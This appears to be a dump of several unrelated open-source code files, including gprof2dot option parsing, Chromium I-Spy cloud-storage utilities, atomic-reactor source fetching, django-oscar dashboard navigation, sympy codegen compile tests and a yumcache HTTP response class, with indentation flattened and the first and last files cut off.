version="%%prog %s" % __version__)
parser.add_option(
'-o', '--output', metavar='FILE',
type="string", dest="output",
help="output filename [stdout]")
parser.add_option(
'-n', '--node-thres', metavar='PERCENTAGE',
type="float", dest="node_thres", default=0.5,
help="eliminate nodes below this threshold [default: %default]")
parser.add_option(
'-e', '--edge-thres', metavar='PERCENTAGE',
type="float", dest="edge_thres", default=0.1,
help="eliminate edges below this threshold [default: %default]")
parser.add_option(
'-f', '--format',
type="choice", choices=('prof', 'callgrind', 'oprofile', 'hprof', 'sysprof', 'pstats', 'shark', 'sleepy', 'aqtime', 'xperf'),
dest="format", default="prof",
help="profile format: prof, callgrind, oprofile, hprof, sysprof, shark, sleepy, aqtime, pstats, or xperf [default: %default]")
parser.add_option(
'-c', '--colormap',
type="choice", choices=('color', 'pink', 'gray', 'bw'),
dest="theme", default="color",
help="color map: color, pink, gray, or bw [default: %default]")
parser.add_option(
'-s', '--strip',
action="store_true",
dest="strip", default=False,
help="strip function parameters, template parameters, and const modifiers from demangled C++ function names")
parser.add_option(
'-w', '--wrap',
action="store_true",
dest="wrap", default=False,
help="wrap function names")
# add a new option to control skew of the colorization curve
parser.add_option(
'--skew',
type="float", dest="theme_skew", default=1.0,
help="skew the colorization curve. Values < 1.0 give more variety to lower percentages. Value > 1.0 give less variety to lower percentages")
(self.options, self.args) = parser.parse_args(sys.argv[1:])
if len(self.args) > 1 and self.options.format != 'pstats':
parser.error('incorrect number of arguments')
try:
self.theme = self.themes[self.options.theme]
except KeyError:
parser.error('invalid colormap \'%s\'' % self.options.theme)
# set skew on the theme now that it has been picked.
if self.options.theme_skew:
self.theme.skew = self.options.theme_skew
if self.options.format == 'prof':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = GprofParser(fp)
elif self.options.format == 'callgrind':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = CallgrindParser(fp)
elif self.options.format == 'oprofile':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = OprofileParser(fp)
elif self.options.format == 'sysprof':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = SysprofParser(fp)
elif self.options.format == 'hprof':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = HProfParser(fp)
elif self.options.format == 'pstats':
if not self.args:
parser.error('at least one file must be specified for pstats input')
parser = PstatsParser(*self.args)
elif self.options.format == 'xperf':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = XPerfParser(fp)
elif self.options.format == 'shark':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = SharkParser(fp)
elif self.options.format == 'sleepy':
if len(self.args) != 1:
parser.error('exactly one file must be specified for sleepy input')
parser = SleepyParser(self.args[0])
elif self.options.format == 'aqtime':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = AQtimeParser(fp)
else:
parser.error('invalid format \'%s\'' % self.options.format)
self.profile = parser.parse()
if self.options.output is None:
self.output = sys.stdout
else:
self.output = open(self.options.output, 'wt')
self.write_graph()
_parenthesis_re = re.compile(r'\([^()]*\)')
_angles_re = re.compile(r'<[^<>]*>')
_const_re = re.compile(r'\s+const$')
def strip_function_name(self, name):
"""Remove extraneous information from C++ demangled function names."""
# Strip function parameters from name by recursively removing paired parenthesis
while True:
name, n = self._parenthesis_re.subn('', name)
if not n:
break
# Strip const qualifier
name = self._const_re.sub('', name)
# Strip template parameters from name by recursively removing paired angles
while True:
name, n = self._angles_re.subn('', name)
if not n:
break
return name
def wrap_function_name(self, name):
"""Split the function name on multiple lines."""
if len(name) > 32:
ratio = 2.0/3.0
height = max(int(len(name)/(1.0 - ratio) + 0.5), 1)
width = max(len(name)/height, 32)
# TODO: break lines in symbols
name = textwrap.fill(name, width, break_long_words=False)
# Take away spaces
name = name.replace(", ", ",")
name = name.replace("> >", ">>")
name = name.replace("> >", ">>") # catch consecutive
return name
def compress_function_name(self, name):
"""Compress function name according to the user preferences."""
if self.options.strip:
name = self.strip_function_name(name)
if self.options.wrap:
name = self.wrap_function_name(name)
# TODO: merge functions with same resulting name
return name
def write_graph(self):
dot = DotWriter(self.output)
profile = self.profile
profile.prune(self.options.node_thres/100.0, self.options.edge_thres/100.0)
for function in profile.functions.itervalues():
function.name = self.compress_function_name(function.name)
dot.graph(profile, self.theme)
if __name__ == '__main__':
Main().main()
|
oopy/micropython
|
refs/heads/master
|
tests/unicode/file1.py
|
115
|
f = open("unicode/data/utf-8_1.txt", encoding="utf-8")
l = f.readline()
print(l)
print(len(l))
|
nwjs/chromium.src
|
refs/heads/nw45-log
|
chrome/test/ispy/common/ispy_utils.py
|
88
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Internal utilities for managing I-Spy test results in Google Cloud Storage.
See the ispy.ispy_api module for the external API.
"""
import collections
import itertools
import json
import os
import sys
import image_tools
_INVALID_EXPECTATION_CHARS = ['/', '\\', ' ', '"', '\'']
def IsValidExpectationName(expectation_name):
return not any(c in _INVALID_EXPECTATION_CHARS for c in expectation_name)
def GetExpectationPath(expectation, file_name=''):
"""Get the path to a test file in the given test run and expectation.
Args:
expectation: name of the expectation.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return 'expectations/%s/%s' % (expectation, file_name)
def GetFailurePath(test_run, expectation, file_name=''):
"""Get the path to a failure file in the given test run and test.
Args:
test_run: name of the test run.
expectation: name of the expectation.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return GetTestRunPath(test_run, '%s/%s' % (expectation, file_name))
def GetTestRunPath(test_run, file_name=''):
"""Get the path to a the given test run.
Args:
test_run: name of the test run.
file_name: name of the file.
Returns:
the path as a string relative to the bucket.
"""
return 'failures/%s/%s' % (test_run, file_name)
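# For illustration (hypothetical names), the helpers above produce bucket-relative
# paths such as:
#   GetExpectationPath('login-page', 'mask.png')       -> 'expectations/login-page/mask.png'
#   GetFailurePath('run-42', 'login-page', 'diff.png') -> 'failures/run-42/login-page/diff.png'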
class ISpyUtils(object):
"""Utility functions for working with an I-Spy google storage bucket."""
def __init__(self, cloud_bucket):
"""Initialize with a cloud bucket instance to supply GS functionality.
Args:
cloud_bucket: An object implementing the cloud_bucket.BaseCloudBucket
interface.
"""
self.cloud_bucket = cloud_bucket
def UploadImage(self, full_path, image):
"""Uploads an image to a location in GS.
Args:
full_path: the path to the file in GS including the file extension.
image: a RGB PIL.Image to be uploaded.
"""
self.cloud_bucket.UploadFile(
full_path, image_tools.EncodePNG(image), 'image/png')
def DownloadImage(self, full_path):
"""Downloads an image from a location in GS.
Args:
full_path: the path to the file in GS including the file extension.
Returns:
The downloaded RGB PIL.Image.
Raises:
cloud_bucket.NotFoundError: if the path to the image is not valid.
"""
return image_tools.DecodePNG(self.cloud_bucket.DownloadFile(full_path))
def UpdateImage(self, full_path, image):
"""Updates an existing image in GS, preserving permissions and metadata.
Args:
full_path: the path to the file in GS including the file extension.
image: a RGB PIL.Image.
"""
self.cloud_bucket.UpdateFile(full_path, image_tools.EncodePNG(image))
def GenerateExpectation(self, expectation, images):
"""Creates and uploads an expectation to GS from a set of images and name.
This method generates a mask from the uploaded images, then
uploads the mask and the first of the images to GS as an expectation.
Args:
expectation: name for this expectation, any existing expectation with the
name will be replaced.
images: a list of RGB encoded PIL.Images
Raises:
ValueError: if the expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
mask = image_tools.InflateMask(image_tools.CreateMask(images), 7)
self.UploadImage(
GetExpectationPath(expectation, 'expected.png'), images[0])
self.UploadImage(GetExpectationPath(expectation, 'mask.png'), mask)
def PerformComparison(self, test_run, expectation, actual):
"""Runs an image comparison, and uploads discrepancies to GS.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation to use for comparison.
actual: an RGB-encoded PIL.Image that is the actual result.
Raises:
cloud_bucket.NotFoundError: if the given expectation is not found.
ValueError: if the expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
expectation_tuple = self.GetExpectation(expectation)
if not image_tools.SameImage(
actual, expectation_tuple.expected, mask=expectation_tuple.mask):
self.UploadImage(
GetFailurePath(test_run, expectation, 'actual.png'), actual)
diff, diff_pxls = image_tools.VisualizeImageDifferences(
expectation_tuple.expected, actual, mask=expectation_tuple.mask)
self.UploadImage(GetFailurePath(test_run, expectation, 'diff.png'), diff)
self.cloud_bucket.UploadFile(
GetFailurePath(test_run, expectation, 'info.txt'),
json.dumps({
'different_pixels': diff_pxls,
'fraction_different':
diff_pxls / float(actual.size[0] * actual.size[1])}),
'application/json')
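# Illustrative info.txt payload written on a mismatch (numbers are hypothetical):
#   {"different_pixels": 1234, "fraction_different": 0.0016}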
def GetExpectation(self, expectation):
"""Returns the given expectation from GS.
Args:
expectation: the name of the expectation to get.
Returns:
A named tuple: 'Expectation', containing two images: expected and mask.
Raises:
cloud_bucket.NotFoundError: if the test is not found in GS.
"""
Expectation = collections.namedtuple('Expectation', ['expected', 'mask'])
return Expectation(self.DownloadImage(GetExpectationPath(expectation,
'expected.png')),
self.DownloadImage(GetExpectationPath(expectation,
'mask.png')))
def ExpectationExists(self, expectation):
"""Returns whether the given expectation exists in GS.
Args:
expectation: the name of the expectation to check.
Returns:
A boolean indicating whether the test exists.
"""
expected_image_exists = self.cloud_bucket.FileExists(
GetExpectationPath(expectation, 'expected.png'))
mask_image_exists = self.cloud_bucket.FileExists(
GetExpectationPath(expectation, 'mask.png'))
return expected_image_exists and mask_image_exists
def FailureExists(self, test_run, expectation):
"""Returns whether a failure for the expectation exists for the given run.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation that failed.
Returns:
A boolean indicating whether the failure exists.
"""
actual_image_exists = self.cloud_bucket.FileExists(
GetFailurePath(test_run, expectation, 'actual.png'))
test_exists = self.ExpectationExists(expectation)
info_exists = self.cloud_bucket.FileExists(
GetFailurePath(test_run, expectation, 'info.txt'))
return test_exists and actual_image_exists and info_exists
def RemoveExpectation(self, expectation):
"""Removes an expectation and all associated failures with that test.
Args:
expectation: the name of the expectation to remove.
"""
test_paths = self.cloud_bucket.GetAllPaths(
GetExpectationPath(expectation))
for path in test_paths:
self.cloud_bucket.RemoveFile(path)
def GenerateExpectationPinkOut(self, expectation, images, pink_out, rgb):
"""Uploads an ispy-test to GS with the pink_out workaround.
Args:
expectation: the name of the expectation to be uploaded.
images: a json encoded list of base64 encoded png images.
pink_out: an image.
rgb: a json list representing the RGB values of a color to mask out.
Raises:
ValueError: if expectation name is invalid.
"""
if not IsValidExpectationName(expectation):
raise ValueError("Expectation name contains an illegal character: %s." %
str(_INVALID_EXPECTATION_CHARS))
# convert the pink_out into a mask
black = (0, 0, 0, 255)
white = (255, 255, 255, 255)
pink_out.putdata(
[black if px == (rgb[0], rgb[1], rgb[2], 255) else white
for px in pink_out.getdata()])
mask = image_tools.InflateMask(image_tools.CreateMask(images), 7)
combined_mask = image_tools.AddMasks([mask, pink_out])
self.UploadImage(GetExpectationPath(expectation, 'expected.png'), images[0])
self.UploadImage(GetExpectationPath(expectation, 'mask.png'), combined_mask)
def RemoveFailure(self, test_run, expectation):
"""Removes a failure from GS.
Args:
test_run: the name of the test_run.
expectation: the expectation on which the failure to be removed occurred.
"""
failure_paths = self.cloud_bucket.GetAllPaths(
GetFailurePath(test_run, expectation))
for path in failure_paths:
self.cloud_bucket.RemoveFile(path)
def GetFailure(self, test_run, expectation):
"""Returns a given test failure's expected, diff, and actual images.
Args:
test_run: the name of the test_run.
expectation: the name of the expectation the result corresponds to.
Returns:
A named tuple: Failure containing three images: expected, diff, and
actual.
Raises:
cloud_bucket.NotFoundError: if the result is not found in GS.
"""
expected = self.DownloadImage(
GetExpectationPath(expectation, 'expected.png'))
actual = self.DownloadImage(
GetFailurePath(test_run, expectation, 'actual.png'))
diff = self.DownloadImage(
GetFailurePath(test_run, expectation, 'diff.png'))
info = json.loads(self.cloud_bucket.DownloadFile(
GetFailurePath(test_run, expectation, 'info.txt')))
Failure = collections.namedtuple(
'Failure', ['expected', 'diff', 'actual', 'info'])
return Failure(expected, diff, actual, info)
def GetAllPaths(self, prefix, max_keys=None, marker=None, delimiter=None):
"""Gets urls to all files in GS whose path starts with a given prefix.
Args:
prefix: the prefix to filter files in GS by.
max_keys: Integer. Specifies the maximum number of objects returned
marker: String. Only objects whose fullpath starts lexicographically
after marker (exclusively) will be returned
delimiter: String. Turns on directory mode, specifies characters
to be used as directory separators
Returns:
a list containing urls to all objects that started with
the prefix.
"""
return self.cloud_bucket.GetAllPaths(
prefix, max_keys=max_keys, marker=marker, delimiter=delimiter)
|
TomasTomecek/atomic-reactor
|
refs/heads/master
|
atomic_reactor/source.py
|
6
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Code for getting source code to put inside container.
"""
import logging
import copy
import os
import shutil
import tempfile
from atomic_reactor import util
from atomic_reactor.constants import SOURCE_DIRECTORY_NAME
logger = logging.getLogger(__name__)
class Source(object):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
self.provider = provider
self.uri = uri
self.dockerfile_path = dockerfile_path
self.provider_params = provider_params or {}
# TODO: do we want to delete tmpdir when destroying the object?
self.tmpdir = tmpdir or tempfile.mkdtemp()
logger.debug("workdir is %s", repr(self.tmpdir))
self.source_path = os.path.join(self.tmpdir, SOURCE_DIRECTORY_NAME)
logger.debug("source path is %s", repr(self.source_path))
@property
def path(self):
return self.get()
@property
def workdir(self):
return self.tmpdir
def get(self):
"""Run this to get source and save it to `tmpdir` or a newly created tmpdir."""
raise NotImplementedError('Must override in subclasses!')
def get_dockerfile_path(self):
# TODO: will we need figure_out_dockerfile as a separate method?
return util.figure_out_dockerfile(self.path, self.dockerfile_path)
def remove_tmpdir(self):
shutil.rmtree(self.tmpdir)
class GitSource(Source):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
super(GitSource, self).__init__(provider, uri, dockerfile_path,
provider_params, tmpdir)
self.git_commit = self.provider_params.get('git_commit', None)
self.lg = util.LazyGit(self.uri, self.git_commit, self.source_path)
def get(self):
return self.lg.git_path
class PathSource(Source):
def __init__(self, provider, uri, dockerfile_path=None, provider_params=None, tmpdir=None):
super(PathSource, self).__init__(provider, uri, dockerfile_path,
provider_params, tmpdir)
# make sure we have canonical URI representation even if we got path without "file://"
if not self.uri.startswith('file://'):
self.uri = 'file://' + self.uri
self.schemeless_path = self.uri[len('file://'):]
os.makedirs(self.source_path)
def get(self):
# work around the weird behaviour of copytree, which requires the top dir
# to *not* exist
for f in os.listdir(self.schemeless_path):
old = os.path.join(self.schemeless_path, f)
new = os.path.join(self.source_path, f)
if os.path.exists(new):
# this is the second invocation of this method; just break the loop
break
else:
if os.path.isdir(old):
shutil.copytree(old, new)
else:
shutil.copy2(old, new)
return self.source_path
def get_source_instance_for(source, tmpdir=None):
validate_source_dict_schema(source)
klass = None
provider = source['provider'].lower()
if provider == 'git':
klass = GitSource
elif provider == 'path':
klass = PathSource
else:
raise ValueError('unknown source provider "{0}"'.format(provider))
# don't modify original source
args = copy.deepcopy(source)
args['tmpdir'] = tmpdir
return klass(**args)
def validate_source_dict_schema(sd):
if not isinstance(sd, dict):
raise ValueError('"source" must be a dict')
for k in ['provider', 'uri']:
if k not in sd:
raise ValueError('"source" must contain "{0}" key'.format(k))
|
nephila/django-google-webmastertools
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
CLASSIFIERS = [
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP ',
]
setup(
author="Nephila s.a.s.",
author_email='web@nephila.it',
name='google_webmastertools',
version='0.1.0',
description='Django interface to Google Webmaster tools API',
# long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='http://www.nephila.it',
license='see LICENCE.txt',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
"Django < 1.4",
"gdata >= 2.0.17",
],
packages=find_packages(exclude=["project", "project.*"]),
include_package_data=True,
zip_safe=False,
dependency_links=[
],
)
|
Jannes123/django-oscar
|
refs/heads/master
|
src/oscar/apps/dashboard/nav.py
|
23
|
import re
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import NoReverseMatch, resolve, reverse
from django.http import Http404
from oscar.core.loading import AppNotFoundError, get_class
from oscar.views.decorators import check_permissions
class Node(object):
"""
A node in the dashboard navigation menu
"""
def __init__(self, label, url_name=None, url_args=None, url_kwargs=None,
access_fn=None, icon=None):
self.label = label
self.icon = icon
self.url_name = url_name
self.url_args = url_args
self.url_kwargs = url_kwargs
self.access_fn = access_fn
self.children = []
@property
def is_heading(self):
return self.url_name is None
@property
def url(self):
return reverse(self.url_name, args=self.url_args,
kwargs=self.url_kwargs)
def add_child(self, node):
self.children.append(node)
def is_visible(self, user):
return self.access_fn is None or self.access_fn(
user, self.url_name, self.url_args, self.url_kwargs)
def filter(self, user):
if not self.is_visible(user):
return None
node = Node(
label=self.label, url_name=self.url_name, url_args=self.url_args,
url_kwargs=self.url_kwargs, access_fn=self.access_fn,
icon=self.icon
)
for child in self.children:
if child.is_visible(user):
node.add_child(child)
return node
def has_children(self):
return len(self.children) > 0
def default_access_fn(user, url_name, url_args=None, url_kwargs=None):
"""
Given a url_name and a user, this function tries to assess whether the
user has the right to access the URL.
The application instance of the view is fetched via dynamic imports,
and those assumptions will only hold true if the standard Oscar layout
is followed.
Once the permissions for the view are known, the access logic used
by the dashboard decorator is evaluated
This function might seem costly, but a simple comparison with DTT
did not show any change in response time
"""
exception = ImproperlyConfigured(
"Please follow Oscar's default dashboard app layout or set a "
"custom access_fn")
if url_name is None: # it's a heading
return True
# get view module string
try:
url = reverse(url_name, args=url_args, kwargs=url_kwargs)
view_module = resolve(url).func.__module__
except (NoReverseMatch, Http404):
# if there's no match, no need to display it
return False
# We can't assume that the view has the same parent module as the app,
# as either the app or view can be customised. So we turn the module
# string (e.g. 'oscar.apps.dashboard.catalogue.views') into an app
# label that can be loaded by get_class (e.g.
# 'dashboard.catalogue.app'), which then essentially checks
# INSTALLED_APPS for the right module to load
match = re.search('(dashboard[\w\.]*)\.views$', view_module)
if not match:
raise exception
app_label_str = match.groups()[0] + '.app'
try:
app_instance = get_class(app_label_str, 'application')
except AppNotFoundError:
raise exception
# handle name-spaced view names
if ':' in url_name:
view_name = url_name.split(':')[1]
else:
view_name = url_name
permissions = app_instance.get_permissions(view_name)
return check_permissions(user, permissions)
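# Illustrative walk-through (hypothetical url_name 'dashboard:catalogue-product-list'):
# resolve() yields a view module such as 'oscar.apps.dashboard.catalogue.views',
# the regex extracts 'dashboard.catalogue', get_class loads
# 'dashboard.catalogue.app', and its get_permissions('catalogue-product-list')
# result is handed to check_permissions(user, ...).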
|
madan96/sympy
|
refs/heads/master
|
sympy/external/tests/test_codegen.py
|
73
|
# This tests the compilation and execution of the source code generated with
# utilities.codegen. The compilation takes place in a temporary directory that
# is removed after the test. By default the test directory is always removed,
# but this behavior can be changed by setting the environment variable
# SYMPY_TEST_CLEAN_TEMP to:
# export SYMPY_TEST_CLEAN_TEMP=always : the default behavior.
# export SYMPY_TEST_CLEAN_TEMP=success : only remove the directories of working tests.
# export SYMPY_TEST_CLEAN_TEMP=never : never remove the directories with the test code.
# When a directory is not removed, the necessary information is printed on
# screen to find the files that belong to the (failed) tests. If a test does
# not fail, py.test captures all the output and you will not see the directories
# corresponding to the successful tests. Use the --nocapture option to see all
# the output.
# All tests below have a counterpart in utilities/test/test_codegen.py. In the
# latter file, the resulting code is compared with predefined strings, without
# compilation or execution.
# All the generated Fortran code should conform with the Fortran 95 standard,
# and all the generated C code should be ANSI C, which facilitates the
# incorporation in various projects. The tests below assume that the binary cc
# is somewhere in the path and that it can compile ANSI C code.
from __future__ import print_function
from sympy.abc import x, y, z
from sympy.utilities.pytest import skip
from sympy.utilities.codegen import codegen, make_routine, get_code_generator
import sys
import os
import tempfile
import subprocess
# templates for the main program that will test the generated code.
main_template = {}
main_template['F95'] = """
program main
include "codegen.h"
integer :: result;
result = 0
%(statements)s
call exit(result)
end program
"""
main_template['C'] = """
#include "codegen.h"
#include <stdio.h>
#include <math.h>
int main() {
int result = 0;
%(statements)s
return result;
}
"""
# templates for the numerical tests
numerical_test_template = {}
numerical_test_template['C'] = """
if (fabs(%(call)s)>%(threshold)s) {
printf("Numerical validation failed: %(call)s=%%e threshold=%(threshold)s\\n", %(call)s);
result = -1;
}
"""
numerical_test_template['F95'] = """
if (abs(%(call)s)>%(threshold)s) then
write(6,"('Numerical validation failed:')")
write(6,"('%(call)s=',e15.5,'threshold=',e15.5)") %(call)s, %(threshold)s
result = -1;
end if
"""
# command sequences for supported compilers
compile_commands = {}
compile_commands['cc'] = [
"cc -c codegen.c -o codegen.o",
"cc -c main.c -o main.o",
"cc main.o codegen.o -lm -o test.exe"
]
compile_commands['gfortran'] = [
"gfortran -c codegen.f90 -o codegen.o",
"gfortran -ffree-line-length-none -c main.f90 -o main.o",
"gfortran main.o codegen.o -o test.exe"
]
compile_commands['g95'] = [
"g95 -c codegen.f90 -o codegen.o",
"g95 -ffree-line-length-huge -c main.f90 -o main.o",
"g95 main.o codegen.o -o test.exe"
]
compile_commands['ifort'] = [
"ifort -c codegen.f90 -o codegen.o",
"ifort -c main.f90 -o main.o",
"ifort main.o codegen.o -o test.exe"
]
combinations_lang_compiler = [
('C', 'cc'),
('F95', 'ifort'),
('F95', 'gfortran'),
('F95', 'g95')
]
def try_run(commands):
"""Run a series of commands and only return True if all ran fine."""
null = open(os.devnull, 'w')
for command in commands:
retcode = subprocess.call(command, stdout=null, shell=True,
stderr=subprocess.STDOUT)
if retcode != 0:
return False
return True
def run_test(label, routines, numerical_tests, language, commands, friendly=True):
"""A driver for the codegen tests.
This driver assumes that the compiler invoked by the given commands is
present in the PATH and, for the Fortran tests, that it supports (at least)
Fortran 90. The generated code is written in
a temporary directory, together with a main program that validates the
generated code. The test passes when the compilation and the validation
run correctly.
"""
# Check input arguments before touching the file system
language = language.upper()
assert language in main_template
assert language in numerical_test_template
# Check that the environment variable makes sense
clean = os.getenv('SYMPY_TEST_CLEAN_TEMP', 'always').lower()
if clean not in ('always', 'success', 'never'):
raise ValueError("SYMPY_TEST_CLEAN_TEMP must be one of the following: 'always', 'success' or 'never'.")
# Do all the magic to compile, run and validate the test code
# 1) prepare the temporary working directory, switch to that dir
work = tempfile.mkdtemp("_sympy_%s_test" % language, "%s_" % label)
oldwork = os.getcwd()
os.chdir(work)
# 2) write the generated code
if friendly:
# interpret the routines as a name_expr list and call the friendly
# function codegen
codegen(routines, language, "codegen", to_files=True)
else:
code_gen = get_code_generator(language, "codegen")
code_gen.write(routines, "codegen", to_files=True)
# 3) write a simple main program that links to the generated code, and that
# includes the numerical tests
test_strings = []
for fn_name, args, expected, threshold in numerical_tests:
call_string = "%s(%s)-(%s)" % (
fn_name, ",".join(str(arg) for arg in args), expected)
if language == "F95":
call_string = fortranize_double_constants(call_string)
threshold = fortranize_double_constants(str(threshold))
test_strings.append(numerical_test_template[language] % {
"call": call_string,
"threshold": threshold,
})
if language == "F95":
f_name = "main.f90"
elif language == "C":
f_name = "main.c"
else:
raise NotImplementedError(
"FIXME: filename extension unknown for language: %s" % language)
with open(f_name, "w") as f:
f.write(
main_template[language] % {'statements': "".join(test_strings)})
# 4) Compile and link
compiled = try_run(commands)
# 5) Run if compiled
if compiled:
executed = try_run(["./test.exe"])
else:
executed = False
# 6) Clean up stuff
if clean == 'always' or (clean == 'success' and compiled and executed):
def safe_remove(filename):
if os.path.isfile(filename):
os.remove(filename)
safe_remove("codegen.f90")
safe_remove("codegen.c")
safe_remove("codegen.h")
safe_remove("codegen.o")
safe_remove("main.f90")
safe_remove("main.c")
safe_remove("main.o")
safe_remove("test.exe")
os.chdir(oldwork)
os.rmdir(work)
else:
print("TEST NOT REMOVED: %s" % work, file=sys.stderr)
os.chdir(oldwork)
# 7) Do the assertions in the end
assert compiled, "failed to compile %s code with:\n%s" % (
language, "\n".join(commands))
assert executed, "failed to execute %s code from:\n%s" % (
language, "\n".join(commands))
def fortranize_double_constants(code_string):
"""
Replaces every literal float with literal doubles
"""
import re
pattern_exp = re.compile('\d+(\.)?\d*[eE]-?\d+')
pattern_float = re.compile('\d+\.\d*(?!\d*d)')
def subs_exp(matchobj):
return re.sub('[eE]', 'd', matchobj.group(0))
def subs_float(matchobj):
return "%sd0" % matchobj.group(0)
code_string = pattern_exp.sub(subs_exp, code_string)
code_string = pattern_float.sub(subs_float, code_string)
return code_string
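# For example (illustrative input): fortranize_double_constants("2.0*x + 1.5e-3")
# returns "2.0d0*x + 1.5d-3", i.e. plain float literals gain a d0 suffix and
# exponent markers switch from e/E to d.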
def is_feasible(language, commands):
# This test should always work, otherwise the compiler is not present.
routine = make_routine("test", x)
numerical_tests = [
("test", ( 1.0,), 1.0, 1e-15),
("test", (-1.0,), -1.0, 1e-15),
]
try:
run_test("is_feasible", [routine], numerical_tests, language, commands,
friendly=False)
return True
except AssertionError:
return False
valid_lang_commands = []
invalid_lang_compilers = []
for lang, compiler in combinations_lang_compiler:
commands = compile_commands[compiler]
if is_feasible(lang, commands):
valid_lang_commands.append((lang, commands))
else:
invalid_lang_compilers.append((lang, compiler))
# We test all language-compiler combinations, just to report what is skipped
def test_C_cc():
if ("C", 'cc') in invalid_lang_compilers:
skip("`cc' command didn't work as expected")
def test_F95_ifort():
if ("F95", 'ifort') in invalid_lang_compilers:
skip("`ifort' command didn't work as expected")
def test_F95_gfortran():
if ("F95", 'gfortran') in invalid_lang_compilers:
skip("`gfortran' command didn't work as expected")
def test_F95_g95():
if ("F95", 'g95') in invalid_lang_compilers:
skip("`g95' command didn't work as expected")
# Here comes the actual tests
def test_basic_codegen():
numerical_tests = [
("test", (1.0, 6.0, 3.0), 21.0, 1e-15),
("test", (-1.0, 2.0, -2.5), -2.5, 1e-15),
]
name_expr = [("test", (x + y)*z)]
for lang, commands in valid_lang_commands:
run_test("basic_codegen", name_expr, numerical_tests, lang, commands)
def test_intrinsic_math1_codegen():
# not included: log10
from sympy import acos, asin, atan, ceiling, cos, cosh, floor, log, ln, \
sin, sinh, sqrt, tan, tanh, N
name_expr = [
("test_fabs", abs(x)),
("test_acos", acos(x)),
("test_asin", asin(x)),
("test_atan", atan(x)),
("test_cos", cos(x)),
("test_cosh", cosh(x)),
("test_log", log(x)),
("test_ln", ln(x)),
("test_sin", sin(x)),
("test_sinh", sinh(x)),
("test_sqrt", sqrt(x)),
("test_tan", tan(x)),
("test_tanh", tanh(x)),
]
numerical_tests = []
for name, expr in name_expr:
for xval in 0.2, 0.5, 0.8:
expected = N(expr.subs(x, xval))
numerical_tests.append((name, (xval,), expected, 1e-14))
for lang, commands in valid_lang_commands:
if lang == "C":
name_expr_C = [("test_floor", floor(x)), ("test_ceil", ceiling(x))]
else:
name_expr_C = []
run_test("intrinsic_math1", name_expr + name_expr_C,
numerical_tests, lang, commands)
def test_intrinsic_math2_codegen():
# not included: frexp, ldexp, modf, fmod
from sympy import atan2, N
name_expr = [
("test_atan2", atan2(x, y)),
("test_pow", x**y),
]
numerical_tests = []
for name, expr in name_expr:
for xval, yval in (0.2, 1.3), (0.5, -0.2), (0.8, 0.8):
expected = N(expr.subs(x, xval).subs(y, yval))
numerical_tests.append((name, (xval, yval), expected, 1e-14))
for lang, commands in valid_lang_commands:
run_test("intrinsic_math2", name_expr, numerical_tests, lang, commands)
def test_complicated_codegen():
from sympy import sin, cos, tan, N
name_expr = [
("test1", ((sin(x) + cos(y) + tan(z))**7).expand()),
("test2", cos(cos(cos(cos(cos(cos(cos(cos(x + y + z))))))))),
]
numerical_tests = []
for name, expr in name_expr:
for xval, yval, zval in (0.2, 1.3, -0.3), (0.5, -0.2, 0.0), (0.8, 2.1, 0.8):
expected = N(expr.subs(x, xval).subs(y, yval).subs(z, zval))
numerical_tests.append((name, (xval, yval, zval), expected, 1e-12))
for lang, commands in valid_lang_commands:
run_test(
"complicated_codegen", name_expr, numerical_tests, lang, commands)
|
Stratoscale/yumcache
|
refs/heads/master
|
yumcache/liveresponse.py
|
1
|
import time
from yumcache import cachedresponse
class LiveResponse:
def __init__(self, connection, downloader, range):
self._connection = connection
self._downloader = downloader
self._range = range
self._chunked = False
def replay(self):
if not self._waitToStart():
return
self._sendHeader()
self._sendContent()
def _waitToStart(self):
while self._downloader.length() is None:
time.sleep(0.1)
if self._downloader.error() is not None:
cachedresponse.CachedResponse(self._connection).respondNotFound()
return False
return True
def _sendHeader(self):
if self._range is None:
self._connection.sendall("HTTP/1.1 200 OK\r\n")
self._connection.sendall('content-type: application/octet-stream\r\n')
if self._downloader.length() != self._downloader.INVALID_LENGTH:
self._connection.sendall('content-length: %d\r\n\r\n' % self._downloader.length())
self._range = (0, self._downloader.length() - 1)
else:
self._chunked = True
self._connection.sendall('Transfer-Encoding: chunked\r\n\r\n')
self._range = (0, 1024 * 1024 * 1024)
else:
self._connection.sendall("HTTP/1.1 206 Partial Content\r\n")
self._connection.sendall('content-type: application/octet-stream\r\n')
if self._downloader.length() != self._downloader.INVALID_LENGTH:
self._connection.sendall(
'content-range: bytes %d-%d/%d\r\n' % (
self._range[0], self._range[1], self._downloader.length()))
else:
